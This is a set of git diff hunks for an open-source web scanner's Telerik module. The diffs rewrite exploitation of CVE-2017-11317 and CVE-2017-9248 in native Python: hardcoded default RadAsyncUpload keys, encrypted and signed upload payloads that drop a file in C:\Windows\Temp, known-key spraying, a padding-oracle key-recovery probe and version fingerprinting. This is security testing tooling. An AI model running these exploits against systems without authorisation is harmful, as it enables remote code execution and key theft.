-            return "<= 2019 (Either Pre-2017 (vulnerable), or 2017-2019 w/ Encrypt-Then-Mac)", True
-        return "unknown", True
+    async def _probe_rau_default_keys(self, url, event):
+        """
+        Send fake-version payloads with default keys across each (KDF, HMAC) variant.
+        Response `Could not load file or assembly` = crypto succeeded, .NET failed to load
+        the bogus assembly type -> default keys accepted, no file uploaded.
+        """
+        for kdf_mode, include_hmac in self._RAU_PROBE_VARIANTS:
+            payload = self._build_rau_multipart(
+                self._RAU_FAKE_VERSION, RAU_DEFAULT_ENC_KEY, RAU_DEFAULT_HASH_KEY, kdf_mode, include_hmac
+            )
+            response = await self.helpers.request(url, method="POST", files=payload)
+            if not response or "Could not load file or assembly" not in response.text:
+                continue
+            self.debug(f"RAU default keys accepted (KDF={kdf_mode}, HMAC={include_hmac})")
+            await self.emit_event(
+                {
+                    "host": str(event.host),
+                    "url": url,
+                    "description": (
+                        f"Telerik RAU accepts default keys (KDF={kdf_mode}, HMAC={include_hmac}). "
+                        "RCE is achievable once the exact installed Telerik version is identified; "
+                        "no file was uploaded by this probe."
+                    ),
+                    "name": "Telerik RAU Default Keys Accepted (CVE-2017-11317)",
+                    "severity": "HIGH",
+                    "confidence": "HIGH",
+                },
+                "FINDING",
+                event,
+                context=f"{{module}} confirmed default RAU keys at {url} without uploading",
+            )
+            return
 
     async def _confirm_rau_knownkey(self, url, event, base_url):
-        """Spray default RAU keys across candidate versions. `{"fileInfo":` in the response = RCE."""
+        """
+        Version-identification + exploit. Iterate real Telerik versions with default keys;
+        the one producing `{"fileInfo":` also uploads the benign 1-byte probe file to the
+        target's C:\\Windows\\Temp\\. Only runs when exploit_rau=True.
+        """
         for version in self.telerik_versions:
-            payload = self._build_rau_multipart(version, RAU_DEFAULT_ENC_KEY, RAU_DEFAULT_HASH_KEY)
+            if int(version[:4]) <= 2017 or version == "2018.1.117":
+                kdf_mode = "PBKDF1_MS"
+            else:
+                kdf_mode = "PBKDF2"
+            include_hmac = int(version[:4]) >= 2017
+            payload = self._build_rau_multipart(
+                version, RAU_DEFAULT_ENC_KEY, RAU_DEFAULT_HASH_KEY, kdf_mode, include_hmac
+            )
             response = await self.helpers.request(url, method="POST", files=payload)
             if response and '"fileInfo":' in response.text:
                 self.debug(f"Confirmed RAU RCE (version: {version})")
@@ -329,23 +371,23 @@ class telerik(BaseModule):
         cipher = AES.new(key, AES.MODE_CBC, iv)
         return base64.b64encode(cipher.encrypt(padded.encode())).decode()
 
-    def _rau_sign(self, ciphertext_b64, version, hashkey):
-        if int(version[:4]) < 2017:
+    def _rau_sign(self, ciphertext_b64, hash_key, include_hmac):
+        if not include_hmac:
             return ciphertext_b64
         from Crypto.Hash import HMAC, SHA256
 
-        h = HMAC.new(key=hashkey.encode(), msg=ciphertext_b64.encode(), digestmod=SHA256.new())
+        h = HMAC.new(key=hash_key.encode(), msg=ciphertext_b64.encode(), digestmod=SHA256.new())
         return f"{ciphertext_b64}{base64.b64encode(h.digest()).decode()}"
 
-    def _build_rau_multipart(self, version, enc_key, hash_key):
-        """Build the httpx `files=` dict for a RAU exploit payload matching `version` + keys."""
-        if int(version[:4]) <= 2017 or version == "2018.1.117":
+    def _build_rau_multipart(self, assembly_version, enc_key, hash_key, kdf_mode, include_hmac):
+        """Build the httpx `files=` dict for a RAU payload with explicit KDF + HMAC choices."""
+        if kdf_mode == "PBKDF1_MS":
             key, iv = self._enc.telerik_derivekeys_PBKDF1_MS(enc_key)
         else:
             key, iv = self._enc.telerik_derivekeys_PBKDF2(enc_key)
 
-        enc_target_folder = self._rau_sign(self._rau_encrypt("", key, iv), version, hash_key)
-        enc_temp_folder = self._rau_sign(self._rau_encrypt("C:\\Windows\\Temp\\", key, iv), version, hash_key)
+        enc_target_folder = self._rau_sign(self._rau_encrypt("", key, iv), hash_key, include_hmac)
+        enc_temp_folder = self._rau_sign(self._rau_encrypt("C:\\Windows\\Temp\\", key, iv), hash_key, include_hmac)
         rau_post_data_json = (
             f'{{"TargetFolder":"{enc_target_folder}",'
             f'"TempTargetFolder":"{enc_temp_folder}",'
@@ -356,7 +398,7 @@ class telerik(BaseModule):
             '"UseApplicationPoolImpersonation":false}'
         )
         assembly_type = (
-            f"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version={version}, "
+            f"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version={assembly_version}, "
             "Culture=neutral, PublicKeyToken=121fae78165ba3d4"
         )
         rau_post_data = f"{self._rau_encrypt(rau_post_data_json, key, iv)}&{self._rau_encrypt(assembly_type, key, iv)}"

--- a/bbot/modules/telerik.py
+++ b/bbot/modules/telerik.py
@@ -283,6 +283,9 @@ class telerik(BaseModule):
 
     async def setup(self):
         self._rau_confirmed = set()
+        # base_url -> Telerik version confirmed via the RAU upload path. The same install
+        # backs the DialogHandler, so an RAU-confirmed version enriches DH findings too.
+        self._rau_version_by_base = {}
         custom_secrets = self.config.get("custom_secrets", None)
         if custom_secrets:
             path = Path(custom_secrets).expanduser()
@@ -316,18 +319,24 @@ class telerik(BaseModule):
             await self._probe_rau(base_url, event)
             dh_url = await self._probe_dialoghandler(base_url, event)
             if dh_url:
-                await self._probe_dialoghandler_exploit(dh_url, event)
+                # RAU + DH run on the same Telerik.Web.UI install, so a version confirmed
+                # via the RAU upload path (rau_confirm_version=True) also applies to DH.
+                rau_version = self._rau_version_by_base.get(base_url)
+                await self._probe_dialoghandler_exploit(dh_url, event, rau_version)
             await self._probe_spellcheck(base_url, event)
             await self._probe_chartimage(base_url, event)
         elif event.type == "HTTP_RESPONSE":
             await self._carve_http_response(event)
 
-    async def _probe_dialoghandler_exploit(self, dh_url, event):
+    async def _probe_dialoghandler_exploit(self, dh_url, event, rau_version=None):
         """
         Known-key spray first (definitive: recovers the actual keys). If nothing matches,
         fall back to the dp_cryptomg baseline probe (chosen-plaintext byte-oracle test).
         Oracle only runs on PBKDF1_MS targets; the CVE-2017-9248 patch moved to PBKDF2
         specifically to defeat this attack, so probing PBKDF2 is wasted requests.
+
+        `rau_version`, when set, was confirmed by the RAU upload path on the same host —
+        both handlers back onto the same Telerik.Web.UI install, so the version applies.
         """
         kdf_mode = None
         if self.config.get("try_known_keys"):
@@ -340,7 +349,7 @@ class telerik(BaseModule):
             candidate_kdfs = (kdf_mode,) if kdf_mode in ("PBKDF1_MS", "PBKDF2") else ("PBKDF1_MS", "PBKDF2")
             for candidate in candidate_kdfs:
                 self.verbose(f"Spraying known keys against DialogHandler ({candidate})")
-                if await self._probe_dialoghandler_knownkey(dh_url, event, candidate):
+                if await self._probe_dialoghandler_knownkey(dh_url, event, candidate, rau_version=rau_version):
                     return
                 self.verbose(f"Known-key spray exhausted for {candidate}, no match")
         if self.config.get("probe_dialoghandler_oracle"):
@@ -353,7 +362,7 @@ class telerik(BaseModule):
             # KDF-specific error), the target could still be oracle-vulnerable — try anyway.
             if kdf_mode != "PBKDF2":
                 self.verbose("Running dp_cryptomg find_baseline byte-oracle probe (up to 81 requests)")
-                await self._probe_dialoghandler_oracle(dh_url, event)
+                await self._probe_dialoghandler_oracle(dh_url, event, rau_version=rau_version)
 
     def _base_url(self, event):
         if self.config.get("include_subdirs"):
@@ -510,6 +519,7 @@ class telerik(BaseModule):
             response = await self.helpers.request(url, method="POST", files=payload)
             if response and '"fileInfo":' in response.text:
                 self.verbose(f"RAU RCE confirmed on version {version}; benign file was uploaded to target")
+                self._rau_version_by_base[base_url] = version
                 await self.emit_event(
                     {
                         "host": str(event.host),
@@ -657,7 +667,7 @@ class telerik(BaseModule):
             return "PBKDF1_MS"
         return None
 
-    async def _probe_dialoghandler_oracle(self, dh_url, event):
+    async def _probe_dialoghandler_oracle(self, dh_url, event, rau_version=None):
         """
         Port of dp_cryptomg's find_baseline(): send crafted GET ?dp=<base64(4 bytes)>
         payloads iterating combinations of [0x00, 0x6b, 0x08]. A response containing
@@ -677,13 +687,14 @@ class telerik(BaseModule):
                 or "String was not recognized as a valid Boolean." in text
             ):
                 self.verbose(f"dp_cryptomg baseline probe leaked on 4-byte combo {combo!r}; oracle confirmed")
+                version_note = f" Version: [{rau_version}] (from RAU)" if rau_version else ""
                 await self.emit_event(
                     {
                         "host": str(event.host),
                         "url": dh_url,
                         "description": (
                             "Telerik DialogHandler is exploitable via CVE-2017-9248 byte-oracle "
-                            "key recovery (baseline probe leaked decryption state)"
+                            f"key recovery.{version_note}"
                         ),
                         "name": "Telerik DialogHandler Oracle (CVE-2017-9248)",
                         "severity": "CRITICAL",
@@ -696,7 +707,7 @@ class telerik(BaseModule):
                 return True
         return False
 
-    async def _probe_dialoghandler_knownkey(self, dh_url, event, kdf_mode):
+    async def _probe_dialoghandler_knownkey(self, dh_url, event, kdf_mode, rau_version=None):
         """Returns True if a known key pair was recovered and a finding emitted."""
         include_machinekeys = self.config.get("include_machinekeys", False)
         if kdf_mode == "PBKDF1_MS":
@@ -714,23 +725,112 @@ class telerik(BaseModule):
         else:
             return False
 
-        await self.emit_event(
-            {
-                "host": str(event.host),
-                "url": dh_url,
-                "description": (
-                    f"Telerik DialogHandler configured with a known hash/encryption key pair. "
-                    f"Hash key: [{hash_key}] Encryption key: [{enc_key}] KDF: [{kdf_mode}]"
-                ),
-                "name": "Telerik DialogHandler Known Key (CVE-2017-9248)",
-                "severity": "CRITICAL",
-                "confidence": "CONFIRMED",
-            },
-            "FINDING",
-            event,
-            context=f"{{module}} recovered a known Telerik key pair at {dh_url}",
-        )
+        # We have the keys — reuse them to identify the installed Telerik version
+        # via response-size delta from a fake-version baseline. Safe (no uploads).
+        # Emit follows the same pattern as RAU: CRITICAL/CONFIRMED when version is nailed,
+        # HIGH/HIGH with an "attempted but failed" note when it isn't.
+        self.verbose(f"Identifying DialogHandler Telerik version (baseline + {len(self.telerik_versions)} probes)")
+        version = await self._detect_dh_version(dh_url, hash_key, enc_key, kdf_mode)
+        # If DH probing didn't identify a version but RAU already did on this host, use that —
+        # same install, same Telerik.Web.UI.dll.
+        version_source = None
+        if version:
+            version_source = "DH probe"
+        elif rau_version:
+            version = rau_version
+            version_source = "RAU"
+
+        if version:
+            self.verbose(f"DH version identified: {version} (via {version_source})")
+            await self.emit_event(
+                {
+                    "host": str(event.host),
+                    "url": dh_url,
+                    "description": (
+                        f"Telerik DialogHandler configured with a known hash/encryption key pair "
+                        f"and identified version. Hash key: [{hash_key}] Encryption key: [{enc_key}] "
+                        f"KDF: [{kdf_mode}] Version: [{version}] (source: {version_source})"
+                    ),
+                    "name": "Telerik DialogHandler Known Key (CVE-2017-9248)",
+                    "severity": "CRITICAL",
+                    "confidence": "CONFIRMED",
+                },
+                "FINDING",
+                event,
+                context=f"{{module}} recovered a known Telerik key pair and version at {dh_url}",
+            )
+        else:
+            self.verbose("DH version detection exhausted; emitting HIGH keys-accepted finding")
+            await self.emit_event(
+                {
+                    "host": str(event.host),
+                    "url": dh_url,
+                    "description": (
+                        f"Telerik DialogHandler configured with a known hash/encryption key pair. "
+                        f"Hash key: [{hash_key}] Encryption key: [{enc_key}] KDF: [{kdf_mode}]. "
+                        "Version detection was attempted but failed — target's installed Telerik "
+                        "version is not in the candidate list."
+                    ),
+                    "name": "Telerik DialogHandler Known Key (CVE-2017-9248)",
+                    "severity": "HIGH",
+                    "confidence": "HIGH",
+                },
+                "FINDING",
+                event,
+                context=f"{{module}} recovered a known Telerik key pair (version unknown) at {dh_url}",
+            )
         return True
+
+    async def _detect_dh_version(self, dh_url, hash_key, enc_key, kdf_mode):
+        """
+        Once keys are known, iterate versions in the DialogTypeName plaintext to identify the
+        installed Telerik.Web.UI. Mirrors badsecrets DialogHandler.probe_version: fake-version
+        9999.9.999 gives us a baseline response size; a real installed version produces a
+        response ~10+ bytes off baseline because the assembly loads and the dialog code
+        proceeds further.
+        """
+        baseline_size = await self._dh_version_probe_size(dh_url, "9999.9.999", hash_key, enc_key, kdf_mode)
+        if baseline_size is None:
+            self.verbose("DH version baseline probe failed")
+            return None
+        for version in self.telerik_versions:
+            size = await self._dh_version_probe_size(dh_url, version, hash_key, enc_key, kdf_mode)
+            if size is None:
+                continue
+            if abs(size - baseline_size) > 10:
+                self.verbose(f"DH version identified: {version} (size delta {size - baseline_size})")
+                return version
+        return None
+
+    async def _dh_version_probe_size(self, dh_url, version, hash_key, enc_key, kdf_mode):
+        """
+        Build a DialogParameters payload with `version` in the DialogTypeName field and return
+        the target's response length (or None on network failure). Payload skeleton matches
+        badsecrets DialogHandler.probe_version's non-modern form.
+        """
+        b64section_plain = (
+            f"Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, "
+            f"Version={version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4"
+        )
+        b64section = base64.b64encode(b64section_plain.encode()).decode()
+        plaintext = (
+            "EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;"
+            "EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;"
+            "UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;"
+            "EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;"
+            "LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;"
+            "ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;"
+            "ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;"
+            f"Telerik.DialogDefinition.DialogTypeName,False,0,{b64section};"
+            "AllowMultipleSelection,False,3,False"
+        )
+        derived_key, derived_iv = self._enc.telerik_derivekeys(enc_key, kdf_mode)
+        ct = self._enc.telerik_encrypt(derived_key, derived_iv, plaintext)
+        signed = self._hash.sign_enc_dialog_params(hash_key, ct)
+        response = await self.helpers.request(dh_url, method="POST", data={"dialogParametersHolder": signed})
+        if not response:
+            return None
+        return len(response.text)
 
     async def _solve_dh_hashkey(self, dh_url, include_machinekeys):
         """PBKDF1_MS mode: hashkey solves independently via 'input data is not a complete block' oracle."""

--- a/bbot/modules/telerik.py
+++ b/bbot/modules/telerik.py
@@ -1,23 +1,36 @@
-from sys import executable
+import base64
+
+from Crypto.Cipher import AES
+from badsecrets import modules_loaded
 
 from bbot.modules.base import BaseModule
 from bbot.core.config.models import BaseModuleConfig, Field
 
 
+Telerik_HashKey = modules_loaded["telerik_hashkey"]
+Telerik_EncryptionKey = modules_loaded["telerik_encryptionkey"]
+
+
+# Default RAU keys shipped with Telerik.Web.UI pre-R2 2017 SP2 (CVE-2017-11317).
+RAU_DEFAULT_ENC_KEY = "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration"
+RAU_DEFAULT_HASH_KEY = "PrivateKeyForHashOfUploadConfiguration"
+
+
 class telerik(BaseModule):
     """
-    Test for endpoints associated with Telerik.Web.UI.dll
+    Detect Telerik.Web.UI vulnerabilities:
 
-    Telerik.Web.UI.WebResource.axd (CVE-2017-11317)
-    Telerik.Web.UI.DialogHandler.aspx (CVE-2017-9248)
-    Telerik.Web.UI.SpellCheckHandler.axd (associated with CVE-2017-9248)
-    ChartImage.axd (CVE-2019-19790)
+      - CVE-2017-11317: RadAsyncUpload insecure deserialization (RAU)
+      - CVE-2017-9248:  DialogHandler dp encryption-key leak (oracle + known keys)
+      - CVE-2019-19790: ChartImage.axd path traversal / SpellCheckHandler exposure
 
-    For the Telerik Report Server vulnerability (CVE-2024-4358) Use the Nuclei Template: (https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-4358.yaml)
+    Handler surfaces detected: RAU (Telerik.Web.UI.WebResource.axd?type=rau),
+    DialogHandler (Telerik.Web.UI.DialogHandler.aspx and variants),
+    SpellCheckHandler (Telerik.Web.UI.SpellCheckHandler.axd), ChartImage.axd, and
+    SerializedParameters / _serializedConfiguration blobs surfacing in HTTP responses.
 
-    With exploit_RAU_crypto enabled, the module will attempt to exploit CVE-2017-11317. THIS WILL UPLOAD A (benign) FILE IF SUCCESSFUL.
-
-    Will dedupe to host by default (running against first received URL). With include_subdirs enabled, will run against every directory.
+    CVE-2024-4358 (Telerik Report Server auth bypass) is not covered here; use the
+    projectdiscovery/nuclei-templates CVE-2024-4358 template.
     """
 
     watched_events = ["URL", "HTTP_RESPONSE"]
@@ -29,7 +42,7 @@ class telerik(BaseModule):
         "author": "@liquidsec",
     }
 
-    telerikVersions = [
+    telerik_versions = [
         "2007.1423",
         "2007.1521",
         "2007.1626",
@@ -117,7 +130,7 @@ class telerik(BaseModule):
         "2017.3.913",
     ]
 
-    DialogHandlerUrls = [
+    dialoghandler_urls = [
         "Telerik.Web.UI.DialogHandler.aspx",
         "Telerik.Web.UI.DialogHandler.axd",
         "Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx",
@@ -152,273 +165,459 @@ class telerik(BaseModule):
         "WebUIDialogs/Telerik.Web.UI.DialogHandler.aspx",
     ]
 
-    RAUConfirmed = []
-
     class Config(BaseModuleConfig):
-        exploit_RAU_crypto: bool = Field(False, description="Attempt to confirm any RAU AXD detections are vulnerable")
-        include_subdirs: bool = Field(False, description="Include subdirectories in the scan (off by default)")
+        exploit_rau: bool = Field(
+            False,
+            description="Attempt to confirm RAU RCE with default keys. Uploads a benign file if successful.",
+        )
+        include_subdirs: bool = Field(
+            False,
+            description="Probe every discovered subdirectory instead of only the site root.",
+        )
+        try_known_keys: bool = Field(
+            True,
+            description="After DialogHandler detection, spray known Telerik hash/encryption keys (via badsecrets).",
+        )
+        probe_dialoghandler_oracle: bool = Field(
+            True,
+            description="After DialogHandler detection, probe for CVE-2017-9248 oracle-vulnerable state.",
+        )
+        include_machinekeys: bool = Field(
+            False,
+            description="Also spray ASP.NET machineKey values (thousands of keys, much slower).",
+        )
 
     in_scope_only = True
 
-    deps_pip = ["pycryptodome~=3.23.0"]
-
-    deps_ansible = [
-        {"name": "Create telerik dir", "file": {"state": "directory", "path": "#{BBOT_TOOLS}/telerik/"}},
-        {"file": {"state": "touch", "path": "#{BBOT_TOOLS}/telerik/testfile.txt"}},
-        {
-            "name": "Download RAU_crypto",
-            "unarchive": {
-                "src": "https://github.com/bao7uo/RAU_crypto/archive/refs/heads/master.zip",
-                "include": "RAU_crypto-master/RAU_crypto.py",
-                "dest": "#{BBOT_TOOLS}/telerik/",
-                "remote_src": True,
-            },
-        },
-    ]
+    deps_pip = ["badsecrets~=1.2.1"]
 
     _module_threads = 5
 
+    async def setup(self):
+        self._rau_confirmed = set()
+        self._enc = Telerik_EncryptionKey()
+        self._hash = Telerik_HashKey()
+        return True
+
     @staticmethod
-    def normalize_url(url):
+    def _normalize_url(url):
         return str(url.rstrip("/") + "/").lower()
 
     def _incoming_dedup_hash(self, event):
         if event.type == "URL":
             if self.config.get("include_subdirs") is True:
-                return hash(f"{event.type}{self.normalize_url(event.url)}")
-            else:
-                return hash(f"{event.type}{event.netloc}")
-        else:  # HTTP_RESPONSE
-            return hash(f"{event.type}{event.url}")
-
-    async def handle_event(self, event):
-        if event.type == "URL":
-            if self.config.get("include_subdirs"):
-                base_url = self.normalize_url(event.url)  # Use the entire URL including subdirectories
-
-            else:
-                base_url = f"{event.parsed_url.scheme}://{event.parsed_url.netloc}/"  # path will be omitted
-
-            # Check for RAU AXD Handler
-            webresource = "Telerik.Web.UI.WebResource.axd?type=rau"
-            result, _ = await self.test_detector(base_url, webresource)
-            if result:
-                if "RadAsyncUpload handler is registered succesfully" in result.text:
-                    self.verbose("Detected Telerik instance (Telerik.Web.UI.WebResource.axd?type=rau)")
-
-                    probe_data = {
-                        "rauPostData": (
-                            None,
-                            "mQheol55IDiQWWSxl+Atkc68JXWUJ6QSirwLhEwleMiw3vN4cwABE74V2fWsLGg8CFXHOP6np90M+sLrLDqFACGNvonxmgT8aBsTZPWbXErewMGNWBP34aX0DmMvXVyTEpQ6FkFhZi19cTtdYfRLI8Uc04uNSsdWnltDMQ2CX/sSLOXUFNnZdAwAXgUuprYhU28Zwh/GdgYh447ksXfAC2fuPqEJqKDDwBlltxsS/zSq8ipIg326ymB2dmOpH/P3hcAmTKOyzB0dW6a6pmJvqNVU+50DlrUC00RbBbTJwlV6Xm4s4XTvgXLvMQ6czz2OAYY18HI+HYX5uvajctj/25UR8edwu68ZCgedsD7EZHRSSthjxohxfAyrfshjcu1LnhCEd0ClowKxBS4eiaLxVxhJAdB7XcbbXxIS9WWKa7gtRMNc/jUAOlIpvOZ3N+bOQ6rsNMHv7TZk1g0bxPl99yBn9qvtAwDMNPDoADxoBSisAkIIl9mImKv7y7nAiKoj7ukApdu5XQuVo10SxwkLkqHcvEEgjxTrOlCbEbxK2/du9TgXxD9iqKyaPLHPzNZsnzCsG6qNXv0fNkeASP9tZAyvi/y1eLrpScE+J7blfT+kBkGPTTFc6Z4z6lN7GqSHofq/CDHC2S2+qdoRdC3C25V74j+Ae6MkpSfqYx4KZYNtxBAxjf9Uf3JVSiZh3X2W/7aFeimFft0h/liybSjJTzO+AwNJluI4kXqemFoHnjVFfUQViaIuk4UP0D861kCU6KIGLZLpOaa0g0KM8hmu3OjwVOy8QVXYtbx5lOmSX9h3imRzMDFRTXK25YpUJgD0/LFMgCeZLA8SCYzkThyN2d8f8n5l8iOScR47o8i8sqCp/fd3JTogSbwD7LxnHudpiw2W/OfpMGipgc6loQFoX4klQaYwKkA4w+GUzahfAJmIiukZuTLOPCPQvX4wKtLqw1YiHtuaLHvLYq2/F66QQXNrZ4SucUNED0p5TUVTvHGUbuA0zxAyYSfYVgTNZjXGguQBY7DsN1SkpCa/ltvIiGtCbHQR86OrvjJMACe0wdpMCqEg7JiGym3RrLqvmjpS&sbZRwxJ96gmXFBSbSvT0ve7jpvDoieqd6RbG+GIP0H7sO5/0ZnvheosB9jQAifuMabY7lW4UzZgr5o2iqE0tBl4SGhfWyYW7iCFXnd3aIuCnUvhT58Rp8g7kGkA/eU/s68E66KOBXNuBnokZR9cIsjE0Tt3Jfxrk018+CmVcXpjXp/RmhRwCJTgEAXQuNplb/KdkLxqDn519iRtbiU6aLZX8YctdFQBqyKVgkk8WYXxcXQ8wYnxtpEtGuBcsndUi1iPp4Od8rYY1HPWg+FIquW17YPHjfP4gO4dhZe4sd7gH0ARyGDjiYVj7ODDE0wGmwmFVdQTrDX5AaxKuJy0NbQ==",
-                        ),
-                        "file": ("blob", b"e1daf48a", "application/octet-stream"),
-                        "fileName": (None, "df8dbc7a"),
-                        "contentType": (None, "text/html"),
-                        "lastModifiedDate": (None, "2020-01-02T08:02:01.067Z"),
-                        "metadata": (
-                            None,
-                            '{"TotalChunks":1,"ChunkIndex":0,"TotalFileSize":1,"UploadID":"3ea7b19db6c5.txt"}',
-                        ),
-                    }
-
-                    version = "unknown"
-                    verbose_errors = False
-                    # send probe
-                    probe_response = await self.helpers.request(
-                        f"{event.url}{webresource}", method="POST", files=probe_data
-                    )
-
-                    if probe_response:
-                        if "Exception Details: " in probe_response.text:
-                            verbose_errors = True
-                            if (
-                                "Telerik.Web.UI.CryptoExceptionThrower.ThrowGenericCryptoException"
-                                in probe_response.text
-                            ):
-                                version = "Post-2020 (Encrypt-Then-Mac Enabled, with Generic Crypto Failure Message)"
-                            elif "Padding is invalid and cannot be removed" in probe_response.text:
-                                version = "<= 2019 (Either Pre-2017 (vulnerable), or 2017-2019 w/ Encrypt-Then-Mac)"
-
-                    description = f"Telerik RAU AXD Handler detected. Verbose Errors Enabled: [{str(verbose_errors)}] Version Guess: [{version}]"
-                    await self.emit_event(
-                        {
-                            "host": str(event.host),
-                            "url": f"{base_url}{webresource}",
-                            "description": description,
-                            "name": "Telerik Handler",
-                            "severity": "INFO",
-                            "confidence": "HIGH",
-                        },
-                        "FINDING",
-                        event,
-                        context=f"{{module}} scanned {base_url} and identified {{event.type}}: Telerik RAU AXD Handler",
-                    )
-                    if self.config.get("exploit_RAU_crypto") is True:
-                        if base_url not in self.RAUConfirmed:
-                            self.RAUConfirmed.append(base_url)
-                            root_tool_path = self.scan.helpers.tools_dir / "telerik"
-
-                            for version in self.telerikVersions:
-                                command = [
-                                    executable,
-                                    str(root_tool_path / "RAU_crypto-master/RAU_crypto.py"),
-                                    "-P",
-                                    "C:\\\\Windows\\\\Temp",
-                                    version,
-                                    str(root_tool_path / "testfile.txt"),
-                                    result.url,
-                                ]
-
-                                # Add proxy if set in the scan config
-                                if self.scan.http_proxy:
-                                    command.append(self.scan.http_proxy)
-
-                                output = await self.run_process(command)
-                                description = f"Confirmed Vulnerable Telerik (version: {str(version)})"
-                                if "fileInfo" in output.stdout:
-                                    self.debug(f"Confirmed Vulnerable Telerik (version: {str(version)}")
-                                    await self.emit_event(
-                                        {
-                                            "severity": "CRITICAL",
-                                            "confidence": "CONFIRMED",
-                                            "description": description,
-                                            "host": str(event.host),
-                                            "url": f"{base_url}{webresource}",
-                                            "name": "Telerik RCE",
-                                        },
-                                        "FINDING",
-                                        event,
-                                        context=f"{{module}} scanned {base_url} and identified critical {{event.type}}: {description}",
-                                    )
-                                    break
-
-            urls = {}
-            for dh in self.DialogHandlerUrls:
-                url = self.create_url(base_url, f"{dh}?dp=1")
-                urls[url] = dh
-
-            fail_count = 0
-            async for url, response in self.helpers.request_batch_stream(list(urls)):
-                # cancel if we run into timeouts etc.
-                if response is None:
-                    fail_count += 1
-
-                    # tolerate some random errors
-                    if fail_count < 2:
-                        continue
-                    self.debug(f"Cancelling run against {base_url} due to failed request")
-                    break
-                else:
-                    if "Cannot deserialize dialog parameters" in response.text:
-                        self.debug(f"Detected Telerik UI instance ({dh})")
-                        description = "Telerik DialogHandler detected"
-                        await self.emit_event(
-                            {
-                                "host": str(event.host),
-                                "url": f"{base_url}{dh}",
-                                "description": description,
-                                "name": "Telerik Handler",
-                                "confidence": "CONFIRMED",
-                                "severity": "INFO",
-                            },
-                            "FINDING",
-                            event,
-                        )
-                        # Once we have a match we need to stop, because the basic handler (Telerik.Web.UI.DialogHandler.aspx) usually works with a path wildcard
-                        break
-
-            spellcheckhandler = "Telerik.Web.UI.SpellCheckHandler.axd"
-            result, _ = await self.test_detector(base_url, spellcheckhandler)
-            status_code = getattr(result, "status_code", 0)
-            # The standard behavior for the spellcheck handler without parameters is a 500
-            if status_code == 500:
-                # Sometimes webapps will just return 500 for everything, so rule out the false positive
-                validate_result, _ = await self.test_detector(base_url, f"{self.helpers.rand_string()}.axd")
-                self.debug(validate_result)
-                validate_status_code = getattr(validate_result, "status_code", 0)
-                if validate_status_code not in (0, 500):
-                    self.debug("Detected Telerik UI instance (Telerik.Web.UI.SpellCheckHandler.axd)")
-                    description = "Telerik SpellCheckHandler detected"
-                    await self.emit_event(
-                        {
-                            "host": str(event.host),
-                            "url": f"{base_url}{spellcheckhandler}",
-                            "description": description,
-                            "name": "Telerik Handler",
-                            "confidence": "CONFIRMED",
-                            "severity": "INFO",
-                        },
-                        "FINDING",
-                        event,
-                        context=f"{{module}} scanned {base_url} and identified {{event.type}}: Telerik SpellCheckHandler",
-                    )
-
-            chartimagehandler = "ChartImage.axd?ImageName=bqYXJAqm315eEd6b%2bY4%2bGqZpe7a1kY0e89gfXli%2bjFw%3d"
-            result, _ = await self.test_detector(base_url, chartimagehandler)
-            status_code = getattr(result, "status_code", 0)
-            if status_code == 200:
-                chartimagehandler_error = "ChartImage.axd?ImageName="
-                result_error, _ = await self.test_detector(base_url, chartimagehandler_error)
-                error_status_code = getattr(result_error, "status_code", 0)
-                if error_status_code not in (0, 200):
-                    await self.emit_event(
-                        {
-                            "host": str(event.host),
-                            "url": f"{base_url}{chartimagehandler}",
-                            "description": "Telerik ChartImage AXD Handler Detected",
-                            "name": "Telerik Handler",
-                            "confidence": "CONFIRMED",
-                            "severity": "INFO",
-                        },
-                        "FINDING",
-                        event,
-                        context=f"{{module}} scanned {base_url} and identified {{event.type}}: Telerik ChartImage AXD Handler",
-                    )
-
-        elif event.type == "HTTP_RESPONSE":
-            resp_body = event.body
-            url = event.url
-            if resp_body:
-                if '":{"SerializedParameters":"' in resp_body:
-                    await self.emit_event(
-                        {
-                            "host": str(event.host),
-                            "url": url,
-                            "description": "Telerik DialogHandler [SerializedParameters] Detected in HTTP Response",
-                            "name": "Telerik Handler",
-                            "confidence": "CONFIRMED",
-                            "severity": "INFO",
-                        },
-                        "FINDING",
-                        event,
-                        context="{module} searched HTTP_RESPONSE and identified {event.type}: Telerik ChartImage AXD Handler",
-                    )
-                elif '"_serializedConfiguration":"' in resp_body:
-                    await self.emit_event(
-                        {
-                            "host": str(event.host),
-                            "url": url,
-                            "description": "Telerik AsyncUpload [serializedConfiguration] Detected in HTTP Response",
-                            "name": "Telerik AsyncUpload",
-                            "confidence": "CONFIRMED",
-                            "severity": "INFO",
-                        },
-                        "FINDING",
-                        event,
-                        context="{module} searched HTTP_RESPONSE and identified {event.type}: Telerik AsyncUpload",
-                    )
-
-    def create_url(self, baseurl, detector):
-        return f"{baseurl}{detector}"
-
-    async def test_detector(self, baseurl, detector):
-        result = None
-        url = self.create_url(baseurl, detector)
-        result = await self.helpers.request(url, timeout=self.scan.http_timeout)
-        return result, detector
+                return hash(f"{event.type}{self._normalize_url(event.url)}")
+            return hash(f"{event.type}{event.netloc}")
+        return hash(f"{event.type}{event.url}")
 
     async def filter_event(self, event):
         if event.type == "URL" and "endpoint" in event.tags:
             return False
+        return True
+
+    async def handle_event(self, event):
+        if event.type == "URL":
+            base_url = self._base_url(event)
+            await self._probe_rau(base_url, event)
+            dh_url = await self._probe_dialoghandler(base_url, event)
+            if dh_url:
+                kdf_mode = None
+                if self.config.get("probe_dialoghandler_oracle"):
+                    kdf_mode = await self._probe_dialoghandler_oracle(dh_url, event)
+                if self.config.get("try_known_keys"):
+                    if kdf_mode is None:
